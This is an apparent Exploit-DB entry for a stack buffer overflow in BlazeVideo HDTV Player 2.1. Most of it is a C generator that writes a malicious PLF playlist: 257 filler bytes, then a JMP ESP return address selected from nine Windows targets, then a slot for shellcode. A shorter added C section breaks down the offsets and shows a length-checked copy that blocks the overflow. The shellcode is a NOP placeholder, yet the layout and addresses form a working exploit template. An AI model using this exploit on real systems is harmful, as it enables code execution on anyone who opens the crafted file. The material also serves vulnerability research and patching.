BlazeVideo HDTV Player <= 2.1 Malformed PLF Buffer Overflow PoC

ID EDB-ID:2880
Type exploitdb
Reporter Greg Linares
Modified 2006-12-01T00:00:00


BlazeVideo HDTV Player <= 2.1 Malformed PLF Buffer Overflow PoC. CVE-2006-6199, CVE-2006-6396, CVE-2009-0450. Local exploit for the Windows platform

0-day BlazeVideo HDTV Player <= v2.1 Malformed PLF Buffer Overflow PoC
BlazeVideo HDTV Player v2.1 and prior fails to properly handle long file paths inside
PLF playlist files. The result is a stack-based buffer overflow that lets an
attacker who supplies a crafted PLF file execute code in the context of the player.

This exploit should also work for BlazeDVD v5.0, but I haven't gotten
around to testing it.

C:\ + [BUFFER x 257 bytes] + [JMP] + [16 Garbage bytes] + [SHELLCODE in ESP]
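The layout above, worked through in C as an added example (this is not the advisory's generator and not BlazeVideo's code): it builds one crafted PLF line from the stated offsets, so the arithmetic behind "3 + 257 bytes, then the return address, then 16 bytes, then shellcode" is explicit, and it places the unbounded-copy pattern the advisory describes next to the length check that stops it. The 260-byte destination buffer (chosen because 3 + 257 = 260 = MAX_PATH), the `PLF_*`/`OFF_*` names, the sample NOP-sled bytes and the sample playlist entry are all assumptions constructed for the example.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Assumed size of the stack buffer the player copies a PLF entry into.
 * Picked to match the PoC layout ("C:\" + 257 filler bytes = 260 bytes
 * before the saved return address); it is an assumption, not knowledge
 * of BlazeVideo's code. */
#define PLF_PATH_BUF 260

/* Byte offsets in the crafted line, derived from the advisory's layout. */
enum {
    OFF_PREFIX    = 0,                 /* "C:\"                                      */
    OFF_FILLER    = 3,                 /* 257 x 'A'                                  */
    OFF_JMP       = 3 + 257,           /* 260: overwritten return address -> JMP ESP */
    OFF_GARBAGE   = OFF_JMP + 4,       /* 264: 16 filler bytes                       */
    OFF_SHELLCODE = OFF_GARBAGE + 16   /* 280: ESP points here, shellcode starts     */
};

/* Constructed stand-in for shellcode: a NOP sled ending in INT3, not a real payload. */
static const unsigned char SAMPLE_SC[] = { 0x90, 0x90, 0x90, 0x90, 0xCC };

/* Build one crafted PLF line into out (capacity cap).
 * Returns the number of bytes written, or -1 if cap is too small. */
int build_plf_line(unsigned char *out, size_t cap, unsigned int jmp_esp,
                   const unsigned char *sc, size_t sclen)
{
    size_t total = OFF_SHELLCODE + sclen + 2;           /* + CRLF terminator */
    if (cap < total) return -1;
    memcpy(out + OFF_PREFIX, "C:\\", 3);
    memset(out + OFF_FILLER, 'A', 257);
    /* Little-endian return address, exactly as the PoC writes it byte by byte. */
    out[OFF_JMP + 0] = (unsigned char)(jmp_esp & 0xff);
    out[OFF_JMP + 1] = (unsigned char)((jmp_esp >> 8) & 0xff);
    out[OFF_JMP + 2] = (unsigned char)((jmp_esp >> 16) & 0xff);
    out[OFF_JMP + 3] = (unsigned char)((jmp_esp >> 24) & 0xff);
    memset(out + OFF_GARBAGE, 0x58, 16);                /* 0x58 = POP EAX, harmless if executed */
    memcpy(out + OFF_SHELLCODE, sc, sclen);
    out[OFF_SHELLCODE + sclen]     = '\r';
    out[OFF_SHELLCODE + sclen + 1] = '\n';
    return (int)total;
}

/* Length of the playlist entry with its trailing CR/LF removed. */
static size_t entry_len(const unsigned char *line, size_t linelen)
{
    while (linelen && (line[linelen - 1] == '\r' || line[linelen - 1] == '\n'))
        linelen--;
    return linelen;
}

/* The unbounded-copy pattern the advisory describes (assumed shape, shown for
 * contrast). Call it only with input known to fit: on the crafted line it
 * would write past `path` and over the saved return address. */
int plf_path_copy_unsafe(char *path, const unsigned char *line, size_t linelen)
{
    size_t n = entry_len(line, linelen);
    memcpy(path, line, n);                              /* no check against PLF_PATH_BUF */
    path[n] = '\0';
    return 1;
}

/* Hardened version: an entry that does not fit, terminator included, is rejected
 * outright rather than silently truncated. */
int plf_path_copy_safe(char *path, size_t pathcap, const unsigned char *line, size_t linelen)
{
    size_t n = entry_len(line, linelen);
    if (n >= pathcap) return 0;
    memcpy(path, line, n);
    path[n] = '\0';
    return 1;
}

/* Would an entry of this length overflow a PLF_PATH_BUF-sized stack buffer? */
int line_overflows(const unsigned char *line, size_t linelen)
{
    return entry_len(line, linelen) >= PLF_PATH_BUF;
}

int main(void)
{
    unsigned char line[512];
    char path[PLF_PATH_BUF];
    int n = build_plf_line(line, sizeof line, 0x77db41bcu, SAMPLE_SC, sizeof SAMPLE_SC);
    printf("crafted line: %d bytes, return address at %d, shellcode at %d, overflows=%d\n",
           n, OFF_JMP, OFF_SHELLCODE, line_overflows(line, (size_t)n));
    printf("safe copy accepts crafted line: %d\n",
           plf_path_copy_safe(path, sizeof path, line, (size_t)n));
    const unsigned char ok[] = "C:\\Videos\\clip.mpg\r\n";   /* constructed normal entry */
    printf("safe copy accepts normal entry: %d (%s)\n",
           plf_path_copy_safe(path, sizeof path, ok, sizeof ok - 1), path);
    return 0;
}
```

The check in `plf_path_copy_safe` is the whole fix: compare the entry length against the destination capacity before copying, and treat "does not fit" as a malformed entry rather than something to truncate. Truncating would avoid the crash but still let an attacker steer which bytes land in the buffer.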

Happy Hunting and Happy Holidays to everyone

<insert super awesome leet ascii art here>

30 days of Media Player Exploits by Greg Linares

Discovered and Reported By: Greg Linares
Reported Exploit Date: 12/1/2006


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
        FILE *Exploit;

        /* Executes Calc.exe Alpha2 Shellcode Provided by Expanders <expanders[at]gmail[dot]com> */
        /* The shellcode bytes are not reproduced on this page; the NOP placeholder
           below only keeps the generator compilable. */
        unsigned char scode[] = "\x90\x90\x90\x90";

        /* replace it with your own shellcode :) */

        int JMP, x;

        printf("BlazeVideo HDTV Player <= v2.1 Malformed PLF Buffer Overflow Exploit\n");
        printf("Discovered and Coded By: Greg Linares <GLinares.code[at]gmail[dot]com>\n");
        printf("Usage: %s <output PLF file> <JMP>\n", argv[0]);
        printf("\n JMP Options\n");
        printf("1 = English Windows XP SP 2 User32.dll <JMP ESP 0x77db41bc>\n");
        printf("2 = English Windows XP SP 1 User32.dll <JMP ESP 0x77d718fc>\n");
        printf("3 = English Windows 2003 SP0 and SP1 User32.dll <JMP ESP 0x77d74adc>\n");
        printf("4 = English Windows 2000 SP 4 User32.dll  <JMP ESP 0x77e3c256>\n");
        printf("5 = French Windows XP Pro SP2  <JMP ESP 0x77d8519f> \n");
        printf("6 = German/Italian/Dutch/Polish Windows XP SP2  <JMP ESP 0x77d873a0> \n");
        printf("7 = Spanish Windows XP Pro SP2 <JMP ESP 0x77d9932f> \n");
        printf("8 = French/Italian/German/Polish/Dutch Windows 2000 Pro SP4 <JMP ESP 0x77e04c29>\n");
        printf("9 = French/Italian/Chinese Windows 2000 Server SP4 <JMP ESP 0x77df4c29>\n");

        /* thanks metasploit and jerome for opcodes */

        /* both the output file and the JMP option are required */
        if (argc < 3) {
                printf("Invalid Number Of Arguments\n");
                return 1;
        }

        /* binary mode so the address bytes and the CRLF terminator are written unchanged */
        Exploit = fopen(argv[1], "wb");
        if ( !Exploit ) {
                printf("\nCouldn't Open File!");
                return 1;
        }

        /* "C:\" plus 257 filler bytes fills the path buffer up to the saved return address */
        fputs("C:\\", Exploit);

        for (x=0;x<257;x++) {
                fputs("A", Exploit);
        }

        /* JMP option: anything outside 1..9 falls back to option 1 */
        if (atoi(argv[2]) <= 0) {
                JMP = 1;
        } else if (atoi(argv[2]) > 9) {
                JMP = 1;
        } else {
                JMP = atoi(argv[2]);
        }

        /* overwrite the return address with a JMP ESP (little-endian) */
        switch(JMP) {
                case 1:
                        printf("Using English Windows XP SP2 JMP...\n");
                        fputs("\xbc\x41\xdb\x77", Exploit);
                        break;
                case 2:
                        printf("Using English Windows XP SP1 JMP...\n");
                        fputs("\xfc\x18\xd7\x77", Exploit);
                        break;
                case 3:
                        printf("Using English Windows 2003 SP0 & SP1 JMP...\n");
                        fputs("\xdc\x4a\xd7\x77", Exploit);
                        break;
                case 4:
                        printf("Using English Windows 2000 SP 4 JMP...\n");
                        fputs("\x56\xc2\xe3\x77", Exploit);
                        break;
                case 5:
                        printf("Using French Windows XP SP 2 JMP...\n");
                        fputs("\x9f\x51\xd8\x77", Exploit);
                        break;
                case 6:
                        printf("Using German/Italian/Dutch/Polish Windows XP SP 2 JMP...\n");
                        fputs("\xa0\x73\xd8\x77", Exploit);
                        break;
                case 7:
                        printf("Using Spanish Windows XP SP 2 JMP...\n");
                        fputs("\x2f\x93\xd9\x77", Exploit);
                        break;
                case 8:
                        printf("Using French/Italian/German/Polish/Dutch Windows 2000 Pro SP 4 JMP...\n");
                        fputs("\x29\x4c\xe0\x77", Exploit);
                        break;
                case 9:
                        printf("Using French/Italian/Chinese Windows 2000 Server SP 4 JMP...\n");
                        fputs("\x29\x4c\xdf\x77", Exploit);
                        break;
        }

        /* 16 filler bytes (0x58 = POP EAX, harmless if executed) between the
           return address and the shellcode that ESP points at */
        for (x=0;x<16;x++) {
                fputs("\x58", Exploit);
        }
        fputs((const char *)scode, Exploit);
        fputs("\r\n", Exploit);
        fclose(Exploit);

        printf("Exploit Succeeded...\n Output File: %s\n\n", argv[1]);

        printf("Exploit Coded by Greg Linares (GLinares.code[at]gmail[dot]com)\n");
        printf("Greetz to: Everyone at EEye, Metasploit Crew, Jerome Athias and Expanders - Thanks For The Ideas, Tools and Alpha2 Shell Code\n");
        return 0;
}

// [2006-12-01]